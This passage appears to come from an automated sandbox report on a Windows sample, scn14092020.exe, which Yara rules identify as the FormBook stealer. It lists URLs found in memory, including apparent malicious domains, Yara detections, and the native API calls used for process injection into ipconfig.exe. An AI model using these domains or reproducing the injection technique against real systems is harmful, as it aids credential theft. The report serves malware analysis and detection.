          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
          Source: scn14092020.exe | String found in binary or memory: http://ocsp.digicert.com0C
          Source: scn14092020.exe | String found in binary or memory: http://ocsp.digicert.com0O
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://perldancer.org/
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://validasikan.hostinger.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderi
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/10_Best_Mutual_Funds.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApac
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Contact_Lens.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQEGFH
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Credit_Card_Application.cfm?fp=RL0iRorVcqOHUP0XclK7g10euA
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Designer_Apparel.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQ
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Health_Insurance.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQ
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Healthy_Weight_Loss.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacs
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/Top_Smart_Phones.cfm?fp=RL0iRorVcqOHUP0XclK7g10euApacsMJQ
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/d9s8/?Bh=chLTAJW8o&jDHXN=yQsfb6F
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/display.cfm
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/px.js?ch=1
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/px.js?ch=2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://www.aktivasi-asuransi-bukalapak.com/sk-logabpstatus.php?a=RDhNb29EdmFqY0hTT1dvU2IrckNTa1BKc2l
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: scn14092020.exe | String found in binary or memory: https://www.digicert.com/CPS0

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 0_2_0316C404 NtSetInformationThread,0_2_0316C404
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 0_2_0316C402 NtSetInformationThread,0_2_0316C402
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 0_2_0316CD82 NtSetInformationThread,0_2_0316CD82
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00417930 NtCreateFile,1_2_00417930
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_004179E0 NtReadFile,1_2_004179E0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00417A60 NtClose,1_2_00417A60
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00417B10 NtAllocateVirtualMemory,1_2_00417B10
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_004179DA NtReadFile,1_2_004179DA
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00417987 NtReadFile,1_2_00417987
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00417B0A NtAllocateVirtualMemory,1_2_00417B0A
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F998F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00F998F0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00F99860
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99840 NtDelayExecution,LdrInitializeThunk,1_2_00F99840
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F999A0 NtCreateSection,LdrInitializeThunk,1_2_00F999A0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00F99910
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99A50 NtCreateFile,LdrInitializeThunk,1_2_00F99A50
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99A20 NtResumeThread,LdrInitializeThunk,1_2_00F99A20
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00F99A00
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F995D0 NtClose,LdrInitializeThunk,1_2_00F995D0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99540 NtReadFile,LdrInitializeThunk,1_2_00F99540
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F996E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00F996E0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00F99660
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99FE0 NtCreateMutant,LdrInitializeThunk,1_2_00F99FE0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F997A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00F997A0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99780 NtMapViewOfSection,LdrInitializeThunk,1_2_00F99780
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99710 NtQueryInformationToken,LdrInitializeThunk,1_2_00F99710
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F998A0 NtWriteVirtualMemory,1_2_00F998A0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F9B040 NtSuspendThread,1_2_00F9B040
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99820 NtEnumerateKey,1_2_00F99820
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F999D0 NtCreateProcessEx,1_2_00F999D0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99950 NtQueueApcThread,1_2_00F99950
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99A80 NtOpenDirectoryObject,1_2_00F99A80
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99A10 NtQuerySection,1_2_00F99A10
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F9A3B0 NtGetContextThread,1_2_00F9A3B0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99B00 NtSetValueKey,1_2_00F99B00
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F995F0 NtQueryInformationFile,1_2_00F995F0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99560 NtWriteFile,1_2_00F99560
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F9AD30 NtSetContextThread,1_2_00F9AD30
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99520 NtWaitForSingleObject,1_2_00F99520
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F996D0 NtCreateKey,1_2_00F996D0
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99670 NtQueryInformationProcess,1_2_00F99670
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99650 NtQueryValueKey,1_2_00F99650
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99610 NtEnumerateValueKey,1_2_00F99610
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F9A770 NtOpenThread,1_2_00F9A770
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99770 NtSetInformationFile,1_2_00F99770
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99760 NtOpenProcess,1_2_00F99760
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F99730 NtQueryVirtualMemory,1_2_00F99730
          Source: C:\Users\user\Desktop\scn14092020.exe | Code function: 1_2_00F9A710 NtOpenProcessToken,1_2_00F9A710
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9A50 NtCreateFile,LdrInitializeThunk,4_2_02CE9A50
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9B00 NtSetValueKey,LdrInitializeThunk,4_2_02CE9B00
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9840 NtDelayExecution,LdrInitializeThunk,4_2_02CE9840
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_02CE9860
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE99A0 NtCreateSection,LdrInitializeThunk,4_2_02CE99A0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_02CE9910
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE96D0 NtCreateKey,LdrInitializeThunk,4_2_02CE96D0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02CE96E0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9FE0 NtCreateMutant,LdrInitializeThunk,4_2_02CE9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9780 NtMapViewOfSection,LdrInitializeThunk,4_2_02CE9780
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9710 NtQueryInformationToken,LdrInitializeThunk,4_2_02CE9710
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE95D0 NtClose,LdrInitializeThunk,4_2_02CE95D0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9540 NtReadFile,LdrInitializeThunk,4_2_02CE9540
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9A80 NtOpenDirectoryObject,4_2_02CE9A80
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9A00 NtProtectVirtualMemory,4_2_02CE9A00
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9A10 NtQuerySection,4_2_02CE9A10
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE9A20 NtResumeThread,4_2_02CE9A20
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CEA3B0 NtGetContextThread,4_2_02CEA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE98F0 NtReadVirtualMemory,4_2_02CE98F0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CE98A0 NtWriteVirtualMemory,4_2_02CE98A0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_02CEB040 NtSuspendThread,4_2_02CEB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9820 NtEnumerateKey,4_2_02CE9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE99D0 NtCreateProcessEx,4_2_02CE99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9950 NtQueueApcThread,4_2_02CE9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9650 NtQueryValueKey,4_2_02CE9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9660 NtAllocateVirtualMemory,4_2_02CE9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9670 NtQueryInformationProcess,4_2_02CE9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9610 NtEnumerateValueKey,4_2_02CE9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE97A0 NtUnmapViewOfSection,4_2_02CE97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9760 NtOpenProcess,4_2_02CE9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEA770 NtOpenThread,4_2_02CEA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9770 NtSetInformationFile,4_2_02CE9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEA710 NtOpenProcessToken,4_2_02CEA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9730 NtQueryVirtualMemory,4_2_02CE9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE95F0 NtQueryInformationFile,4_2_02CE95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9560 NtWriteFile,4_2_02CE9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CE9520 NtWaitForSingleObject,4_2_02CE9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CEAD30 NtSetContextThread,4_2_02CEAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C7A60 NtClose,4_2_024C7A60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C7930 NtCreateFile,4_2_024C7930
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C79E0 NtReadFile,4_2_024C79E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C79DA NtReadFile,4_2_024C79DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C7987 NtReadFile,4_2_024C7987
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 02CAB150 appears 45 times
          Source: C:\Users\user\Desktop\scn14092020.exe Code function: String function: 00F5B150 appears 72 times
          Source: scn14092020.exe Static PE information: invalid certificate
          Source: scn14092020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: scn14092020.exe Binary or memory string: OriginalFilename vs scn14092020.exe
          Source: scn14092020.exe, 00000000.00000002.174750025.000000000438D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAlienRunPE.dll6 vs scn14092020.exe
          Source: scn14092020.exe, 00000001.00000002.208820617.00000000011DF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs scn14092020.exe
          Source: scn14092020.exe, 00000001.00000002.208464928.0000000000EF7000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameipconfig.exej% vs scn14092020.exe
          Source: scn14092020.exe Binary or memory string: OriginalFilenameGoogle Chrome.exe< vs scn14092020.exe
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
